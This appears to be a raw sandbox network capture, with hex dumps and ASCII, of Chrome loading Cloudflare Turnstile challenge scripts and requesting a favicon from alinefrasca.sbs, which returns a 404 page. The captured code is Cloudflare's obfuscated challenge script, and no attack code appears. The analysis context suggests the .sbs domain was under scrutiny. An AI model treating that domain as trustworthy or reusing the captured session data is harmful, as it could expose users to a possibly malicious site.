                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                            Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                            Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.449748104.18.95.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:17 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9998e48bc0e98b&lang=auto HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: script
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:17 UTC331INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:17 GMT
                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                            Content-Length: 120392
                                                                            Connection: close
                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d9998ea6da64792-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:17 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46
                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.vEsr2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e
                                                                            Data Ascii: ng":"Verifying...","turnstile_footer_privacy":"Privacy","turnstile_timeout":"Timed%20out","human_button_text":"Verify%20you%20are%20human","turnstile_feedback_report":"Having%20trouble%3F","turnstile_failure":"Error","testing_only":"Testing%20only.","turn
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 4b 28 38 33 31 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 34 32 31 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 35 34 33 29 29 2f 38 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 38 33 34 29 29 2f 39 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 38 35 33 29 29 2f 31 30 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 38 34 33 29 29 2f 31 31 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 34 32 38 36 34 32 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 37 37 35 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4d 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4d 3d 67
                                                                            Data Ascii: K(831))/6)+parseInt(gK(1421))/7+parseInt(gK(543))/8+parseInt(gK(834))/9+parseInt(gK(853))/10*(-parseInt(gK(843))/11),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,428642),eM=this||self,eN=eM[gL(775)],eO=function(gM,d,e,f,g){return gM=g
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 76 56 70 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 42 51 62 65 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 68 61 6a 43 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 4c 6d 57 52 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 7a 6e 4b 4d 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 57 6e 4a 72 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 45 63 55 79 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 67 4d 28 31 30 38
                                                                            Data Ascii: vVpE':function(h,i){return h!=i},'BQbej':function(h,i){return h>i},'hajCu':function(h,i){return h*i},'LmWRg':function(h,i){return h<i},'znKMV':function(h,i){return h(i)},'WnJra':function(h,i){return h-i},'EcUyI':function(h,i){return h(i)}},e=String[gM(108
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b 2c 53 74 72 69 6e 67 28 4b 29 29 7d 69 66 28 27 27 21 3d 3d 43 29 7b 69 66 28 64 5b 67 50 28 37 30 33 29 5d 28 67 50 28 35 34 38 29 2c 64 5b 67 50 28 31 36 34 33 29 5d 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 67 50 28 38 37 33 29 5d 5b 67 50 28 31 39 35 34 29 5d 5b 67 50 28 31 32 36 35 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 67 50 28 31 38 37 36 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 67 50 28 31 37 39 30 29 5d 28 64 5b 67 50 28 36 31 38 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 50 28 31 38 37 36 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 67 50 28 31 33 39 33 29 5d 28 38 2c 73 29 3b 48 3d
                                                                            Data Ascii: +),x[L]=E++,String(K))}if(''!==C){if(d[gP(703)](gP(548),d[gP(1643)])){if(Object[gP(873)][gP(1954)][gP(1265)](B,C)){if(256>C[gP(1876)](0)){for(s=0;s<F;H<<=1,I==j-1?(I=0,G[gP(1790)](d[gP(618)](o,H)),H=0):I++,s++);for(M=C[gP(1876)](0),s=0;d[gP(1393)](8,s);H=
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 50 2c 39 37 29 5e 74 68 69 73 2e 67 5d 29 2c 74 68 69 73 2e 68 5b 51 5e 74 68 69 73 2e 67 5d 3d 52 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 67 50 28 35 38 32 29 5d 28 48 3c 3c 31 2c 4d 26 31 2e 38 37 29 2c 64 5b 67 50 28 31 36 35 35 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 67 50 28 31 37 39 30 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 64 5b 67 50 28 31 34 33 32 29 5d 28 49 2c 6a 2d 31 29 29 7b 47 5b 67 50 28 31 37 39 30 29 5d 28 64 5b 67 50 28 31 38 34 33 29 5d 28 6f 2c 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 67 50 28 38 31 36 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28
                                                                            Data Ascii: P,97)^this.g]),this.h[Q^this.g]=R}for(M=2,s=0;s<F;H=d[gP(582)](H<<1,M&1.87),d[gP(1655)](I,j-1)?(I=0,G[gP(1790)](o(H)),H=0):I++,M>>=1,s++);for(;;)if(H<<=1,d[gP(1432)](I,j-1)){G[gP(1790)](d[gP(1843)](o,H));break}else I++;return G[gP(816)]('')},'j':function(
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 53 28 31 30 33 36 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 67 53 28 31 32 36 32 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 67 53 28 36 34 33 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4c 3f 31 3a 30 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 64 5b 67 53 28 31 38 37 39 29 5d 28 65 2c 4a 29 2c 4d 3d 64 5b 67 53 28 31 38 38 34 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 67 53 28 38 31 36 29 5d 28 27 27 29 7d 69 66 28 30 3d 3d 78 26 26 28 78 3d 4d 61 74 68 5b 67 53 28 31 30 33 36 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4d 5d
                                                                            Data Ascii: break;case 1:for(J=0,K=Math[gS(1036)](2,16),F=1;d[gS(1262)](F,K);L=d[gS(643)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=F*(0<L?1:0),F<<=1);s[B++]=d[gS(1879)](e,J),M=d[gS(1884)](B,1),x--;break;case 2:return D[gS(816)]('')}if(0==x&&(x=Math[gS(1036)](2,C),C++),s[M]
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 5b 67 4c 28 31 38 33 33 29 5d 3d 27 49 27 2c 66 77 5b 67 4c 28 37 35 31 29 5d 3d 27 62 27 2c 66 78 3d 66 77 2c 65 4d 5b 67 4c 28 31 30 38 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 69 70 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 48 2c 49 2c 4b 2c 46 29 7b 69 66 28 69 70 3d 67 4c 2c 6f 3d 7b 27 65 73 70 48 71 27 3a 69 70 28 35 35 37 29 2c 27 50 67 6e 59 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 48 7d 2c 27 4e 45 76 4d 71 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 56 44 59 4b 52 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 26 48 7d 2c 27 75 43 69 77 59 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48
                                                                            Data Ascii: [gL(1833)]='I',fw[gL(751)]='b',fx=fw,eM[gL(1088)]=function(g,h,i,j,ip,o,x,B,C,D,E,H,I,K,F){if(ip=gL,o={'espHq':ip(557),'PgnYo':function(G,H){return G==H},'NEvMq':function(G,H){return G(H)},'VDYKR':function(G,H){return G&H},'uCiwY':function(G,H){return G<H
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 28 31 35 34 37 29 5d 28 27 3b 27 29 2c 66 43 3d 66 42 5b 67 4c 28 31 31 34 36 29 5d 5b 67 4c 28 31 34 39 38 29 5d 28 66 42 29 2c 65 4d 5b 67 4c 28 35 37 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 69 73 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 66 6f 72 28 69 73 3d 67 4c 2c 6a 3d 7b 7d 2c 6a 5b 69 73 28 31 36 31 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 26 76 7d 2c 6a 5b 69 73 28 31 30 30 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3c 76 7d 2c 6a 5b 69 73 28 31 36 34 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3d 3d 3d 76 7d 2c 6a 5b 69 73 28 31 37 34 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3d 3d 3d 76 7d 2c
                                                                            Data Ascii: (1547)](';'),fC=fB[gL(1146)][gL(1498)](fB),eM[gL(577)]=function(h,i,is,j,k,l,m,n,o){for(is=gL,j={},j[is(1616)]=function(s,v){return s&v},j[is(1005)]=function(s,v){return s<v},j[is(1648)]=function(s,v){return s===v},j[is(1740)]=function(s,v){return s===v},
                                                                            2024-10-28 08:36:17 UTC1369INData Raw: 69 6f 6e 28 66 2c 67 2c 68 2c 69 78 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 3d 28 69 78 3d 67 4c 2c 7b 27 49 64 4d 59 4e 27 3a 69 78 28 31 32 35 33 29 2c 27 63 71 7a 70 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 79 45 5a 75 76 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 42 75 6e 4a 42 27 3a 69 78 28 34 39 37 29 2c 27 52 6b 6a 63 57 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 6f 66 42 73 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 7d 2c 27 65 53 68 69 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 47
                                                                            Data Ascii: ion(f,g,h,ix,i,j,k,l,m,n,o,s,x,B,C,D,E,F){i=(ix=gL,{'IdMYN':ix(1253),'cqzpJ':function(G,H){return G+H},'yEZuv':function(G,H){return G+H},'BunJB':ix(497),'RkjcW':function(G,H,I){return G(H,I)},'ofBsl':function(G,H){return G instanceof H},'eShiZ':function(G


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.449749104.18.95.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:17 UTC742OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:17 UTC240INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:17 GMT
                                                                            Content-Type: image/png
                                                                            Content-Length: 61
                                                                            Connection: close
                                                                            cache-control: max-age=2629800, public
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d9998eacfd96c34-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:17 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.449739188.114.97.34431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:19 UTC638OUTGET /favicon.ico HTTP/1.1
                                                                            Host: alinefrasca.sbs
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: same-origin
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://alinefrasca.sbs/pktcr/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Cookie: PHPSESSID=0vnljmd907ev27c68sitpt9phh
                                                                            2024-10-28 08:36:19 UTC838INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 28 Oct 2024 08:36:19 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            cache-control: private, no-cache, max-age=0
                                                                            pragma: no-cache
                                                                            vary: Accept-Encoding
                                                                            CF-Cache-Status: BYPASS
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tWDJGVbsRup9wEhI8G2C6JBLwORuljVlhy5aGB2I7LpDzpfC8LmIaVaoPSXEVkF9yuPp%2BpSMcGHQE3kqmLYXvbmfzz3oPnw13mj8%2BDJpZaq4QwWYQ7VahPAAB5lKL8bmzBU%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d9998f4cfe74769-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=965&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1216&delivery_rate=2979423&cwnd=251&unsent_bytes=0&cid=50fc750356b0b11a&ts=7979&x=0"
                                                                            2024-10-28 08:36:19 UTC531INData Raw: 34 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f
                                                                            Data Ascii: 4e1<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
                                                                            2024-10-28 08:36:19 UTC725INData Raw: 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64
                                                                            Data Ascii: op: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><d
                                                                            2024-10-28 08:36:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.449750104.18.94.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:19 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:20 UTC240INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:19 GMT
                                                                            Content-Type: image/png
                                                                            Content-Length: 61
                                                                            Connection: close
                                                                            cache-control: max-age=2629800, public
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d9998f8c86b4620-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:20 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
